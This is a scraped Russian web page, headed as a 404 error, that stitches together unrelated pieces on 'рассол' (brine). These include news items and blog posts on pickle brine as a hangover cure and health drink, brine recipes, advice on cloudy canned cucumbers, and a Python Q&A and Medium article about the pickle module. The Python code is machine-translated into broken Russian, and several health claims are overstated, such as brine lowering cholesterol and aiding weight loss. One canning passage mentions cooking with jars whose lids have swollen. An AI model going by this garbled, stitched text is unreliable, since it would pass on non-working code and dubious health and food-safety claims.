Почему рассол: Страница не найдена (ошибка 404)

Содержание

Что происходит с организмом, когда вы пьете огуречный рассол?

https://sputnik.by/20191110/Chto-proiskhodit-s-organizmom-kogda-vy-pete-ogurechnyy-rassol-1043183672.html

Что происходит с организмом, когда вы пьете огуречный рассол?

Что происходит с организмом, когда вы пьете огуречный рассол?

Польза и вред “антипохмельного” коктейля для организма, фигуры и кожи – в специальной справке Sputnik. 10.11.2019, Sputnik Беларусь

2019-11-10T08:30+0300

2019-11-10T08:30+0300

2021-07-06T15:45+0300

справка

здоровье

общество

питание

диета

/html/head/meta[@name=’og:title’]/@content

/html/head/meta[@name=’og:description’]/@content

https://cdnn11.img.sputnik.by/img/104318/35/1043183572_0:47:1920:1132_1920x0_80_0_0_c3bb0125adc9a2b3d750c4815aaa967b.jpg

Соленые огурцы имеют действительно впечатляющие преимущества для человеческого здоровья. По утверждению некоторых источников, именно соленья были секретом вечной красоты Клеопатры. А кисловатая жидкость для засолки овощей – рассол – не только избавляет от похмелья, но и имеет другие скрытые свойства.Польза и вред огуречного рассола – в специальной справке Sputnik.Рассол со знаком плюсНачнем с того, что в рассоле содержится большое количество витаминов различных групп и таких минеральных компонентов, как калий, кальций, магний, железо и другие. А о его пробиотических свойствах ходят легенды.За счет большого количества витаминов и антиоксидантов огуречный рассол укрепляет иммунную систему человека. Также напиток избавляет от мышечных судорог и спазмов. Рассол взяли на вооружение многие спортсмены, ведь напиток предупреждает обезвоживание.Рассол повышает аппетит, ускоряет метаболические процессы в организме и восполняет потраченную энергию. Мало кто знает, но рассол применяется как обезболивающий компресс при травмах и ушибах. И конечно, нельзя не отметить “антипохмельное” свойство рассола.Если говорить о применении огуречной жидкости в косметологии, то питательные маски из рассола снимут отеки и даже помогут избавиться от мозолей.Судя по результатам некоторых исследований, рассол способствует снижению веса и помогает достичь желанной формы. Также он снижает холестерин и “глушит” симптомы ПМС.Рассол со знаком минусКаким бы вкусным и полезным ни был огуречный рассол, не стоит забывать о противопоказаниях к применению напитка. Помните, что в огуречном “коктейле” содержится большое количество соли и уксуса, которые могут негативно повлиять на ваш организм.Читайте также:Что происходит с организмом, когда вы едите тыкву?Что происходит с организмом, когда вы едите помидоры?

https://sputnik.by/20191026/Chto-proiskhodit-s-organizmom-kogda-vy-edite-na-noch-1043094539.html

Sputnik Беларусь

[email protected]

+74956456601

MIA „Rosiya Segodnya“

2019

Sputnik Беларусь

[email protected]

+74956456601

MIA „Rosiya Segodnya“

Новости

ru_BY

Sputnik Беларусь

[email protected]

+74956456601

MIA „Rosiya Segodnya“

https://cdnn11.img.sputnik.by/img/104318/35/1043183572_0:0:1920:1207_1920x0_80_0_0_0db331b1e41cdec48ee8bbb841cd625c.jpg

Sputnik Беларусь

[email protected]

+74956456601

MIA „Rosiya Segodnya“

Sputnik Беларусь

[email protected]

+74956456601

MIA „Rosiya Segodnya“

справка, здоровье , общество, питание, диета

08:30 10.11.2019 (обновлено: 15:45 06.07.2021)Подписаться на

Польза и вред “антипохмельного” коктейля для организма, фигуры и кожи – в специальной справке Sputnik.

Соленые огурцы имеют действительно впечатляющие преимущества для человеческого здоровья. По утверждению некоторых источников, именно соленья были секретом вечной красоты Клеопатры. А кисловатая жидкость для засолки овощей – рассол – не только избавляет от похмелья, но и имеет другие скрытые свойства.

Польза и вред огуречного рассола – в специальной справке Sputnik.

Рассол со знаком плюс

Начнем с того, что в рассоле содержится большое количество витаминов различных групп и таких минеральных компонентов, как калий, кальций, магний, железо и другие. А о его пробиотических свойствах ходят легенды.

Что происходит с организмом, когда вы едите на ночь?

26 октября 2019, 15:21

За счет большого количества витаминов и антиоксидантов огуречный рассол укрепляет иммунную систему человека. Также напиток избавляет от мышечных судорог и спазмов. Рассол взяли на вооружение многие спортсмены, ведь напиток предупреждает обезвоживание.

Рассол повышает аппетит, ускоряет метаболические процессы в организме и восполняет потраченную энергию. Мало кто знает, но рассол применяется как обезболивающий компресс при травмах и ушибах. И конечно, нельзя не отметить “антипохмельное” свойство рассола.

Если говорить о применении огуречной жидкости в косметологии, то питательные маски из рассола снимут отеки и даже помогут избавиться от мозолей.

Судя по результатам некоторых исследований, рассол способствует снижению веса и помогает достичь желанной формы. Также он снижает холестерин и “глушит” симптомы ПМС.

Рассол со знаком минус

Каким бы вкусным и полезным ни был огуречный рассол, не стоит забывать о противопоказаниях к применению напитка. Помните, что в огуречном “коктейле” содержится большое количество соли и уксуса, которые могут негативно повлиять на ваш организм.

Читайте также:

Что происходит с организмом, когда вы едите тыкву?Что происходит с организмом, когда вы едите помидоры?

Поможет ли рассол при похмелье? | Здоровая жизнь | Здоровье

Способов лечения похмелья довольно много, в ход идут как медикаментозные варианты, так и народные средства. Одно из самых популярных — рассол. А вот о том, реально ли он помогает или лучше все же отдавать предпочтение другим продуктам, многие и не задумываются. У врачей же по данному вопросу есть свое мнение.

Рассол — это максимально простой вариант напитка, какой только может быть. Он образуется в результате сквашивания или соления овощей. Из-за брожения в воде образуются молочная и натуральная уксусная кислоты. Также считается, что данный настой содержит большое количество витаминов и микроэлементов — ионы калия, магния, — обогащен витамином С и эфирными маслами. Также в числе плюсов называют присутствующий в нем укроп, который помогает справляться со спазмами и способствует более хорошей работе желудка и кишечника.

Многие не выливают эту жидкость даже тогда, когда достают из нее все овощи в процессе приготовления салата, ведь рассол традиционно используется как средство от похмелья. Объясняется его эффект просто. На фоне приема большого количества алкоголя наступают обезвоживание и сбои в водно-солевом балансе. Соленая жидкость отлично насыщает человека, восполняет как раз этот баланс солей. Из-за сужения сосудов и отека тканей организм испытывает водное голодание. Но при этом обычная вода не будет эффективной, так как она понижает давление.

Казалось бы, на этом фоне рассол становится настоящей панацеей. Вот только врачи говорят, что он нередко может скорее навредить, чем оказать реальную помощь.

«Что касается рассола, который многие используют как средство для восстановления здоровья после злоупотребления алкоголем, тут не все так однозначно. Стоит понимать, что после выпитого может повыситься артериальное давление, и рассол тут окажется не лечебным, а опасным», — отмечает терапевт, эндокринолог и кардиолог Татьяна Романенко.

Не секрет, что при различных проблемах с сердцем и артериальной гипертензии соленые продукты противопоказаны. Ведь соль, хоть непосредственно на давление не оказывает влияния, все же становится причиной задержки жидкости в организме (а она на фоне приема алкоголя и так уже накоплена в тканях), развивается отечность и, как следствие, скачок давления. Так что рассолом можно усугубить свое состояние.

Альтернативные варианты

Медики утверждают: не все так печально. Есть и вполне адекватные замены из числа тех же продуктов питания, которые позволят поправить здоровье после застолья. «Стоит выбирать моченые яблоки, кисломолочные продукты, например кефир или айран. Они могут стать ощутимым подспорьем», — говорит Татьяна Романенко.

Почему рассол из-под огурцов я не выливаю в раковину. 5 удивительных вариантов использования | Дачная жизнь

К концу осени пришло время открытия солений, которые были заготовлены еще с лета. Рассол из-под огурцов я не выливаю, а использую с пользой. Куда же можно применить данную жидкость?

Одним из известных способов применения рассола — это средство от похмельного синдрома, то есть для тех, у кого болит голова после вчерашнего гулянья. Но есть и другие варианты использования чудодейственной жидкости.

Первый вариант

Приготовление вкусного печенья на основе рассола. Для этого потребуется 10 столовых ложек рассола, половина стакана сахара, пол чайной ложки соды, гашенной уксусом, 500 грамм муки. Тесто нужно замесить и разложить по формочкам. Кроме того, можно замесить тесто вместе с рассолом на пироги, хлеб, булки.

Второй вариант

Из рассола получается прекрасный кляр для курицы и рыбы. Для приготовления необычного кляра потребуется 1 л рассола, сода на кончике ножа, 2/4 стакана масла растительного, 2 яйца, все ингредиенты нужно взбить.

Третий вариант

Можно замариновать мясо в рассоле. Нужно взять мясо, нарезать на кусочки. Погрузить последние в рассол на 3-4 часа. Затем необходимо вынуть их из жидкости, поперчить и запечь в духовке. Мясо получается оригинальным, нежным и вкусным.

Четвертый вариант

Можно добавить немного рассола в борщ при его приготовлении для того, чтобы цвет блюда был насыщенным.

Пятый вариант

Огуречный рассол подойдет для маринования яиц. Для этого нужно сварить яйца вкрутую, дать им остыть и очистить. В рассол следует положить душистый перец горошком, зернышки горчицы, кориандр либо прочие специи по желанию дополнительно.

Жидкость нужно закипятить, поставить на медленный огонь, проварить еще несколько минут. Очищенные яйца выложить в емкость и залить немного остывшим маринадом. Затем яйца в рассоле нужно положить в холодильник, где они будут мариноваться до 3-4 дней.

Подписывайтесь на канал «Дачная жизнь» и ставьте лайк!
Другие полезные статьи можно найти здесь.

Что необходимо делать, если помутнел рассол в банке с огурцами

Вкуснейшие консервированные солёные огурцы — это самая лучшая и закуска в зимние застолья, когда нет возможности приобрести свежие овощи. Но наверное, у каждой хозяйки случалось, что стараешься, собираешь огурчики, складываешь их нежно в банки, консервируешь и вроде все, но через некоторое время рассол в банке помутнел. И вся работа пошла насмарку. Солёные огурцы помутнели, что делать? Причины помутнения и маленькие советы вы узнаете в этой статье.

Почему рассол в банке помутнел?

Просто так ничего не происходит. Значит, где-то вы допустили ошибку и сделали что-то неправильно. Есть несколько причин, почему рассол в банке помутнел:

  • Плохо вымытые огурцы. Мельчайшие частички грязи могли попасть в банку с рассол и мог начаться процесс гнилья.
  • Плохо вымытые банки. В банку могла также попасть грязь или банка была вымыта с моющим средством, маленькие части мыла, которые незаметны нашему глазу могли остаться на внутренних стенках банки и из-за этого мог помутнеть рассол.
  • Плохо вымыты пряные травы. Они также могут иметь мельчайшие частички грязи из-за чего мог начаться процесс гнилья.
  • Была использована морская или йодированная соль. В ней содержаться вещество, которые могут вызвать помутнение.
  • Плохо проведена стерилизация крышек и банок. Это касается как пустых, так и заполненных огурцами банок.
  • Нарушение герметичности тары. Другими словами, плохо закатанные банки. Причиной этого могут быть некачественные крышки или сколки на горлышке банки.
  • Причина помутнения рассола в банках может не зависеть от хозяйки. Причиной может быть из-за того, что огурцы напичканы химикатами. Даже предварительное замачивание может не помочь.

Что же делать, если рассол в банке помутнел?

Если рассол в банке помутнел — это плохо. В большинстве случаев такие огурцы нужно выбрасывать. Потому что такая недоброкачественная продукция может привести к такому заболеванию, как ботулизм. А если получилось избежать такого заболевания, то возможно расстройство желудка.

  • Первая ситуация. Итак, если рассол помутнел через 2 – 3 дня после консервации, то его можно спасти. Причина помутнения, в таком случае, может быть из-за развития молочнокислого брожения. Этот этап необходим при солении огурцов. Причина из-за чего это может произойти это не добавления уксуса при консервации. Действия. Если крышка заготовки не вздулась, то банку с мутным рассолом можно открыть, а рассол вылить в кастрюлю прокипятить. После этого необходимо прополоснуть огурцы кипятком прям в банке, потом нужно залить их кипятком на пять минут. После этого нужно вылить воду с огурцов и залить их прокипячённым рассолом и не забыть добавить уксус. А также можно вместо старого рассола можно сделать новый, добавляя в него порцию уксуса. После чего закрыть стерильной крышкой банку и остудить банку в перевёрнутом положении, укутав одеялом.
  • Вторая ситуация. Одна из причин помутнения рассола в банке – это молочнокислое брожение. Некоторые хозяйки знают об этом и поэтому после консервирования банку ставят в холодильник и наблюдают за ней, чтоб она забродила. В течение 7 – 10 дней муть оседает и рассол становится прозрачным. Действия. Если крышка не вздулась и осталась плоской, то такие огурцы можно открывать и смело принимать в пищу, правда, у таких огурцов вкус будет немного отличаться от остальных. А если рассол не стал прозрачным, то такие огурцы можно принимать в пищу, только если они прошли длительную термическую обработку, например сварить рассольник.
  • Третья ситуация. Если крышка от банки вздулась, то такие огурцы принимать в пищу нельзя. Это обозначает, что в банку попали бактерии и микробы, которые вредные не только для овощей, но и для человека. Хотя есть и такие хозяйки, которые используют такие огурцы для приготовления рассольника.

Хозяйке на заметку

Многие хозяйки, начитавшиеся советов о помутневшем рассоле, думают, что такие огурцы можно применять в пищу. Но каждый случай индивидуален для каждого организма. Поэтому нужно хорошо подумать прежде, чем как их употреблять в пищу. Если есть подозрение на то что банка с огурцами испорчена, то выкиньте такие огурцы и не шутите со здоровьем. Подумайте о том, что здоровье важнее и его не купишь.

Полезные советы

Для консервации лучше всего подходят огурцы небольших размеров, без желтизны и невялые. Также лучше чтоб они были прямыми, а не скрюченными, потому что такие огурцы быстро портятся. Если огурцы большие и пустые внутри, то их лучше нарезать кольцами.

Лучше всего они хранятся в компании овощей, например, томата. Необходимо в банку к огурцам положить два томата и тогда они простоят дольше и рассол будет прозрачным.

Такие простые советы позволят вам наслаждаться вкусными консервированными огурцами круглый год.

В ВОЗ объяснили, почему рассол бесполезен после застолий

https://ria.ru/20200102/1563069171.html

В ВОЗ объяснили, почему рассол бесполезен после застолий

В ВОЗ объяснили, почему рассол бесполезен после застолий – РИА Новости, 03.03.2020

В ВОЗ объяснили, почему рассол бесполезен после застолий

Маринованные овощи, квашеная капуста или сыр не смогут устранить все негативные последствия праздничных застолий, эти продукты не являются лекарствами и не… РИА Новости, 03.03.2020

2020-01-02T03:11

2020-01-02T03:11

2020-03-03T18:43

новый год—2020

общество

воз

россия

/html/head/meta[@name=’og:title’]/@content

/html/head/meta[@name=’og:description’]/@content

https://cdnn21.img.ria.ru/images/151198/18/1511981827_0:0:1036:583_1920x0_80_0_0_d0ab0fd8087d9d995304919bcf3835af.jpg

ЖЕНЕВА, 2 янв – РИА Новости, Елизавета Исакова. Маринованные овощи, квашеная капуста или сыр не смогут устранить все негативные последствия праздничных застолий, эти продукты не являются лекарствами и не могут оказать воздействие на печень, рассказал РИА Новости эксперт подразделения по безопасности пищевых продуктов ВОЗ Питер Бен Эмбарек.Ранее китайские ученые выяснили, что лактобактерии, входящие в состав пробиотиков и кисломолочных продуктов, не только благотворно влияют на микрофлору кишечника, но и восстанавливают печень при повреждениях, связанных с употреблением алкоголя. Результаты исследования были опубликованы в начале декабря в журнале Journal of Medicinal Food.Однако данную информацию не смогли подтвердить во Всемирной организации здравоохранения.Таким образом, общий совет от Всемирной организации здравоохранения на ближайшие праздники – не переборщить с салатами и шампанским за праздничным столом и проявлять умеренную физическую активность.

https://radiosputnik.ria.ru/20191231/1563046501.html

россия

РИА Новости

[email protected]

7 495 645-6601

ФГУП МИА «Россия сегодня»

https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/

2020

РИА Новости

[email protected]

7 495 645-6601

ФГУП МИА «Россия сегодня»

https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/

Новости

ru-RU

https://ria.ru/docs/about/copyright.html

https://xn--c1acbl2abdlkab1og.xn--p1ai/

РИА Новости

[email protected]

7 495 645-6601

ФГУП МИА «Россия сегодня»

https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/

https://cdnn21.img.ria.ru/images/151198/18/1511981827_158:0:942:588_1920x0_80_0_0_0d10993acbf1cdd7337e48e905ecb1b6.jpg

РИА Новости

[email protected]

7 495 645-6601

ФГУП МИА «Россия сегодня»

https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/

РИА Новости

[email protected]

7 495 645-6601

ФГУП МИА «Россия сегодня»

https://xn--c1acbl2abdlkab1og.xn--p1ai/awards/

общество, воз, россия

Почему рассол считается отличным напитком после тренировок

Сначала может показаться, что рассол — это довольно смелый выбор. Но есть несколько причин, чтобы подумать ещё раз.

Спортсмены уже много лет пьют этот солёный напиток. Эксперты не могли определить, в чём польза рассола при его употреблении после физических нагрузок. Они полагали, что это помогает облегчить спазмы. И они оказались правы. Оказалось, что рассол не только помогает облегчить мышечные судороги. Вот десять полезных свойств этого необычного напитка.

1. Помогает снять спазмы

Согласно исследованию, опубликованному в журнале «Medicine & Science in Sports & Exercise», у людей, испытывающих обезвоживание и мышечные спазмы после тренировки, при употреблении рассола наблюдалось облегчение болей. И всего лишь 1/3 стакана обладает этим восстанавливающим эффектом. При болях в мышцах рассол более эффективен, чем такое же количество воды. Уксус, который содержится в напитке, помогает облегчить спазмы. Он подавляет нервные сигналы, которые вызывают непроизвольное сокращение усталых мышцы.

2. Поддерживает водный баланс организма

Для многих людей при обезвоживании после тренировки достаточно пить воду. Возможно, это всё, что нужно, если вы в течение часа или меньше выполняете умеренную физическую нагрузку. Но если вы тренируетесь усердно и больше часа или в условиях жаркого климата, вам понадобится что-то поэффективнее воды.

Напиток, содержащий натрий и калий, быстрее справляется с обезвоживанием. Натрий и калий — это электролиты, которые высвобождаются при потоотделении. В рассоле содержится большое количество этих веществ. Рассол помогает организму быстрее восстановить водно-электролитный баланс после длительной тренировки.

Если вы следите за потреблением натрия или сидите на низконатриевой диете, проконсультируйтесь с лечащим врачом и диетологом по поводу употребления рассола.

3. Низкокалорийный напиток для восстановления сил

Если вы пытаетесь похудеть, вы, вероятно, не слишком увлечены потреблением высококалорийных спортивных напитков.

Вы хотите возместить баланс электролитов в организме после изнурительных тренировок и быстрее облегчить боли в мышцах. Рассол вам в помощь.

В нём не содержится жиров, но всё же есть небольшое количество калорий. Один стакан рассола может содержать от 0 до 100 калорий. Их количество зависит от состава напитка.

4. Малозатратный

Если вы регулярно употребляете соленья, вам не нужно тратиться на спортивные напитки. Даже если вы не едите этот продукт, рассол может стать отличной бюджетной заменой дорогим спортивным напиткам.

Вы также можете купить специальные спортивные напитки на основе уксуса, представляющие из себя тот же рассол. Конечно, цена у них выше. Но с другой стороны, вы можете узнать пищевую ценность продукта.

5. Содержит антиоксиданты

Рассол содержит значительное количество двух ключевых антиоксидантов, витаминов С и Е. Антиоксиданты защищают организм от повреждающих частиц, именуемых свободными радикалами. Все мы подвержены воздействию свободных радикалов, поэтому большое количество антиоксидантов в рационе — хорошая идея.

Помимо всего прочего, витамины C и E также способствуют укреплению иммунитета.

6. Помогает в похудении

В рассоле содержится много уксуса. При ежедневном употреблении, небольшое количество уксуса способствует сжиганию лишних килограммов. Исследование показало, что спустя 12 недель употребления 15-30 граммов уксуса, участники потеряли больше килограммов, чем те, кто не употреблял этот продукт.

7. Помогает контролировать уровень сахара

Исследование, опубликованное в издании «Journal of Diabetes Research», показало результаты потребления небольшой порции уксуса перед приёмом пищи. Оказалось, что уксус поддерживает в норме уровень сахара после еды у людей с сахарным диабетом 2 типа, который связан с избыточным весом и ожирением.

Стабилизированный уровень сахара в крови поддерживает общее здоровье организма. Диабет 2 типа встречается у многих людей, и они даже могут не знать об этом. Нерегулируемый уровень сахара в крови вызывает такие серьёзные проблемы со здоровьем, как слепота, нарушение работы сердца и почек.

8. Улучшает пищеварение

Уксус также поддерживает здоровье пищеварительной системы. Уксус — это ферментированный продукт. Такие продукты хорошо влияют на пищеварение. Они способствуют росту полезных бактерий, улучшая микрофлору кишечника.

9. Содержит полезный для здоровья укроп

Рассол с укропом обладает большими полезными качествами. В укропе содержится кверцетин, способствующий понижению холестерина в крови. Помимо этого, укроп часто используют в народной медицине для лечения расстройств, спазмов желудка, метеоризма и других недомоганий пищеварительной системы.

10. Освежает дыхание

Даже если от рассола у вас морщится кожа на губах, его небольшое количество помогает освежить дыхание.

Бактерии, скапливающиеся в полости рта, могут вызывать неприятных запах. Укроп и уксус обладают антибактериальными свойствами. Это мощное сочетание продуктов освежает дыхание.

Комментарии

Огуречный рассол

Огуречный рассол принято рассматривать, как средство от похмелья. А ведь он имеет массу применений и является хранилищем огромного количества витаминов. 

Чем полезен рассол, особенно огуречный

Любая, уважающая себя, хозяйка обязательно выберет время для того, чтобы законсервировать на зиму какие-то фрукты, овощи или ягоды. У кого-то этих запасов окажется много, а у кого-то совсем чуть-чуть. Каждый исходит из своих возможностей и целесообразности. И, конечно же, самыми популярными соленьями, на протяжении долгих столетий, остаются огурцы, помидоры и капуста. И у каждой хозяйки они самые вкусные, самые красивые и самые хрустящие.

Сегодня речь пойдёт не о том, как законсервировать на зиму овощи. Мы поговорим о рассоле, который остаётся после того, как все консервированные овощи уже съедены. А рассол, в большинстве случаев, просто выливается. Именно так поступают большинство из нас. А зря, ведь рассол, особенно огуречный, является ценным овощным продуктом. Именно о нем мы сегодня и поговорим.

Почему рассол от огурцов такой полезный

С давних времён, в народной медицине, рассол используется, как спасительное средство от похмелья. При этом, в организм поступают витамин С и недостающие соли калия и магния. Следует отметить что, при недостатке магния в организме, кровь насыщается кальцием. А кальций, поступающий в кровь, вымывается из костных тканей, что негативно сказывается на их состоянии. Обезвоживание и недостаток кальция и магния, как раз, и обуславливает дурное самочувствие и нестабильную работу сердечно-сосудистой системы.

Кроме этого, экстрактивные вещества, содержащиеся в укропе, способствуют нормализации давления, а сам рассол устраняет обезвоживание организма, эффективно восстанавливая его водно-солевой баланс.

К тому же, он используется в народной медицине, как средство против цинги. Если рассол не обладает большой концентрацией соли, в малых количествах, он может употребляться как аперитив — средство для повышения аппетита. А если его заморозить в виде кубиков, то таким косметическим средством можно, с успехом, ухаживать за кожей. Снизить боль от ушибов и воспаления суставов, а также уменьшить опухоль при растяжении связок поможет компресс из рассола.

Рассол довольно успешно применяется в кулинарии. Он используется для приготовления таких популярных супов, как рассольник, солянка, калья, и служит замечательной приправой для пюре из картофеля. К тому же, он применяется в качестве основы для многих соусов. На нем замешивают тесто для хлеба, пирогов или вареников.

С применением рассола даже можно испечь печенье. Для этого нужно замесить тесто из половины килограмма муки, добавив в него по 10 столовых ложек сахарного песка, растительного масла и рассола. Тесто раскатать. Вырезать из него, стаканом или рюмкой, круглые лепешки и запечь в духовке.

Для того, чтобы приготовить курицу или рыбу в кляре, замечательно подойдёт все тот же рассол, оставшийся после соленых огурцов. Смешиваем по одному стакану муки и рассола. Вбиваем пару сырых яиц. Добавляем, на кончике ножа, соду и одну столовую ложку растительного масла. Всё хорошенько взбиваем и получаем великолепный кляр.

Оригинальную зимнюю окрошку тоже можно приготовить на основе рассола.
Отварить и нарезать кубиками говяжье мясо. Добавить, нарезанные или натёртые на крупной тёрке, солёные огурцы, редьку, маринованный чеснок и, сваренные вкрутую, яйца. Всё перемешать, залить рассолом и остудить в холодильнике.

Он великолепно подходит для маринования мяса. Режем мясо не большими кусками. Заливаем рассолом и оставляем мариноваться на 4 часа. Вынимаем мясо, добавляем в него смесь из специй и оливкового масла. Отправляем в духовку жариться, при температуре 200 градусов, до готовности.

Тот рассол, который остался не использованным, можно сохранить, если его заморозить в тех же самых не больших кубиках. Это самый простой способ. Но можно поступить иначе: Из сухой горчицы следует замесить густое тесто и завернуть его в чистую тряпочку. Накрыть ею банку с рассолом, придавив сверху, и поставить в холодильник.

До свидания, мои уважаемые друзья. Если статья оказалась для вас полезной, поделитесь ею в социальных сетях со своими друзьями. Пусть они тоже об этом узнают и будут вам благодарны.

А, чтобы не пропустить другие интересные новости, просто подпишитесь на обновления. Желаю удачи. Пока.

python – Почему рассол ест память?

Пытаюсь разобраться с записью на диск огромного количества замаринованных данных маленькими кусочками. Вот пример кода:

  из импорта cPickle *
сбор из gc import

ПУТЬ = r'd:\test.dat'
@профиль
Функция защиты (элемент):
    для е в пункте:
        f = открыть (ПУТЬ, 'а', 0)
        f.write (дампы (е))
        f.flush()
        е.закрыть()
        дель ф
        собирать()

если __name__ == '__main__':
    k = [x вместо x в xrange(9999)]
    функция (к)
  

open() и close() размещены внутри цикла, чтобы исключить возможные причины накопления данных в памяти.

Чтобы проиллюстрировать проблему, я прикрепляю результаты профилирования памяти, полученные с помощью стороннего модуля Python memory_profiler:

  Строка # Использование памяти Увеличение содержимого строки
==============================================
    14 @профиль
    15 9,02 МБ 0,00 МБ функция по умолчанию (элемент):
    16 9,02 МБ 0,00 МБ path= r'd:\test.dat'
    17
    18 10,88 МБ 1,86 МБ для e в пункте:
    19 10,88 МБ 0,00 МБ f = открыть (путь, 'a', 0)
    20 10.88 МБ 0,00 МБ f.write(dumps(e))
    21 10,88 МБ 0,00 МБ f.flush()
    22 10,88 МБ 0,00 МБ f.close()
    23 10,88 МБ 0,00 МБ del f
    24 собирать()
  

Во время выполнения цикла происходит странный рост использования памяти. Как это можно устранить? Есть предположения?

При увеличении количества входных данных объем этих дополнительных данных может увеличиться до размера намного большего, чем ввод (upd: в реальной задаче я получаю 300+ Мб)

И более широкий вопрос – какие существуют способы корректной работы с большими объемами данных ввода-вывода в Python?

обновлено: Я переписал код, оставив только тело цикла, чтобы увидеть, когда конкретно происходит рост, и вот результаты:

  Строка # Использование памяти Увеличение содержимого строки
==============================================
    14 @профиль
    15 9.00 МБ 0,00 МБ функция по умолчанию (элемент):
    16 9,00 МБ 0,00 МБ path= r'd:\test.dat'
    17
    18 #для e в элементе:
    19 9,02 МБ 0,02 МБ f = открыть (путь, 'a', 0)
    20 9,23 МБ 0,21 МБ d = дампы (элемент)
    21 9,23 МБ 0,00 МБ f.write(d)
    22 9,23 МБ 0,00 МБ f.flush()
    23 9,23 МБ 0,00 МБ f.close()
    24 9,23 МБ 0,00 МБ del f
    25 9,23 МБ 0,00 МБ собирать()
  

Кажется, что dumps() съедает память.(Хотя я вообще-то думал, что будет write())

Наука о соленьях: что такое соленья?

Маринование — всемирное кулинарное искусство. Если бы вы отправились на международный гастрономический тур, вы найдете маринованные продукты примерно где угодно. Вы можете попробовать кошерные соленые огурцы в Нью-Йорке. Йорк, чатни в Индии, кимчи в Корее, огурцы мисо в Японии, соленые утиные яйца в Китае, маринованная сельдь в Скандинавии, солонина в Ирландии, сальса в Мексике, маринованные свиные ножки на юге США и многое-многое другое.

Что делает рассол рассолом? На самом общем уровне соленья продукты, замоченные в растворах, предотвращающих порчу.

Есть две основные категории солений. К первому типу относятся соленые огурцы, консервированные в уксусе, сильной кислоте, в которой мало бактерий может выжить. Доступно большинство кошерных солений из огурцов в бутылках. в супермаркете консервируются в уксусе.

Другая категория включает соленья, вымоченные в солевом растворе для способствует брожению – рост «хороших» бактерий, которые делают пищу менее уязвимой к «плохим» бактериям, вызывающим порчу.Общие примеры ферментированных солений включает кимчи и много соленых огурцов с укропом.

Маринование — это не только международная технология консервирования пищевых продуктов, это тоже древний. На протяжении тысячелетий наши предки изучили способы маринования продуктов, следуя инстинкту обеспечить излишки продовольствия на случай долгой зимы, голода и других времена нужды. Историкам известно, например, что более двух тысячу лет назад рабочие строили Великую Китайскую стену ели квашеную капусту, разновидность квашеной капусты.

Но маринование продуктов дает гораздо больше, чем просто их сохранение. Это также может изменить их вкус и текстуру в изобилии. интересные и вкусные способы. это не удивительно что культуры по всему миру наслаждаются таким ассортиментом маринованных продукты, как вы обнаружите в своей международной гастрономической экспедиции. На самом деле, говорят эксперты в области пищевых продуктов, эволюция разнообразных маринованных еда в разных культурах способствовала уникальному культурному пищевые предпочтения, такие как острые кислые вкусы в Юго-Восточной Азии и кислые вкусы в Восточной Европе.

Не используйте Python Pickle, если не знаете всех этих пунктов | by Christopher Tao

Изображение RitaE с Pixabay

Плюсы и минусы сериализации Pickle, и когда мы должны ее использовать

По сравнению с большинством других популярных языков программирования, Python, вероятно, имеет наиболее гибкую сериализацию объектов. В Python все является объектом, поэтому можно сказать, что почти все можно сериализовать. Да, модуль, о котором я говорил, это Pickle.

Однако по сравнению с другими «обычными» подходами к сериализации, такими как JSON, у Pickle больше аспектов, с которыми нужно быть осторожными при их использовании.Это то, о чем говорится в заголовке, не используйте Pickle, если вы не знаете этих фактов.

В этой статье я приведу несколько важных заметок о Пикле и надеюсь, что они помогут.

Image by Photo Mix с Pixabay

Используя модуль Python Pickle, мы можем легко сериализовать почти все типы объектов в файл. Прежде чем мы сможем его использовать, его необходимо импортировать.

 import pickle 

В качестве примера возьмем словарь.

 my_dict = { 
'имя': 'Крис',
'возраст': 33
}

Мы можем использовать метод рассол.dump() , чтобы сериализовать словарь и записать его в файл.

 с open('my_dict.pickle', 'wb') as f: 
pickle.dump(my_dict, f)

Затем мы можем прочитать файл и загрузить его обратно в переменную. После этого у нас снова есть точный словарь. Они на 100% идентичны по содержанию.

 с open('my_dict.pickle', 'rb') as f: 
my_dict_unpickled = pickle.load(f)my_dict == my_dict_unpickled
Изображение Christine Sponchia с Pixabay

Действительно, использование JSON принесет больше пользы для сериализации словаря Python в приведенном выше примере.Как правило, у сериализации Pickle есть три основных недостатка.

Минусы-1: Pickle небезопасен

В отличие от JSON, который представляет собой просто фрагмент строки, можно создать вредоносные данные pickle, которые будут выполнять произвольный код во время распаковки .

Поэтому мы должны НИКОГДА не расшифровывать данные, которые могли быть получены из ненадежного источника или которые могли быть подделаны.

Минусы-2: Pickle не читается

Наиболее важным для сериализации словаря Python в строку JSON является то, что результат удобочитаем.Однако это неверно для файла Pickle. Вот файл рассола для словаря, который мы только что собрали. Если мы попытаемся открыть его как текстовый файл, мы получим именно это.

Минусы-3: Pickle ограничен в Python

Объект pickle можно загрузить только с помощью Python. Другие языки могут быть включены для этого, но требуют участия сторонних библиотек и могут по-прежнему не полностью поддерживаться.

В отличие от этого, строка JSON очень часто используется в мире программирования и хорошо поддерживается большинством языков программирования.

Pickle’s Pros

Pickle создает произвольные объекты Python, вызывая произвольные функции, поэтому он небезопасен. Однако это позволяет ему сериализовать практически любой объект Python, чего не могут сделать JSON и другие методы сериализации.

Распаковка объекта обычно не требует «шаблонов». Таким образом, он очень подходит для быстрой и простой сериализации. Например, вы можете сбросить все переменные в файлы рассола и завершить свою программу. Позже вы можете запустить еще один сеанс Python и восстановить все из сериализованных файлов.Таким образом, это позволяет нам выполнять часть программы гораздо более гибким образом.

Другим примером будет многопоточность. Когда мы используем модуль multiprocess для запуска программы в нескольких потоках, мы можем легко отправлять произвольные объекты Python другим процессам или вычислительным узлам.

В этих сценариях проблема безопасности обычно не применяется, и людям не нужно читать объекты. Нам просто нужно быстро, легко и совместимость. В этих случаях Pickle может быть идеальным для использования.

Ну, я продолжаю говорить почти обо всем, что может быть сериализовано Pickle. Теперь позвольте мне показать вам несколько примеров.

Выбор функции

Первым примером будет функция. Да, мы можем сериализовать функцию в Python, потому что функция также является объектом в Python.

 def my_func(num): 
print(f'моя функция добавит 1 к числу {num}')
return num + 1

Просто определите простую функцию для демонстрационных целей. Теперь давайте маринуем его и загрузим в новую переменную.

 с open('my_func.pickle', 'wb') как f: 
pickle.dump(my_func, f) с open('my_func.pickle', 'rb') как f:
my_func_unpickled = pickle.load( f)my_func_unpickled(10)

Новую переменную можно использовать как функцию, и функция будет идентична исходной.

Выбор фрейма данных Pandas

